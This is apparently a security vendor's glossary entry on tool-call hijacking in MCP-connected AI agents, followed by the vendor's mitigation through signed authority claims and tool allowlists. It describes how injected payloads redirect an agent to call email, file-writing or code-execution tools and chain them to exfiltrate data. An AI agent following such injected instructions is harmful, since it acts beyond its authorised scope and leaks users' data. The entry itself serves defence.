Back to Glossary
THREAT

Tool-Call Hijacking

unauthorized tool invocationagent permission driftMCP exploitation

Tool-call hijacking is the unauthorized invocation of an MCP tool — either by an injected instruction that impersonates authorized intent, or by an agent that has drifted beyond its permitted operational scope.

ADVERSARIAL MECHANICS

An injected payload instructs the agent to call a tool not part of the original request. An attacker can redirect the agent to call send_email, write_file, or execute_code tools with attacker-controlled parameters. Chained tool calls amplify the damage: exfiltrate data with one tool, transmit it with another.

PROTOCOL CONTEXT (VEX — AUTHORITY PILLAR)

The VEX Protocol's Authority pillar addresses this directly: every tool invocation must be cryptographically bound to an authorized principal and a declared intent scope. An Evidence Capsule carries a signed authority claim specifying permitted tools.

ProvnAI Mitigation

Tool-call authorization in ProvnAI operates on a dual-layer model. The VEX Authority Control layer defines per-session tool allowlists tied to a verified principal. McpVanguard enforces these allowlists deterministically at the proxy boundary.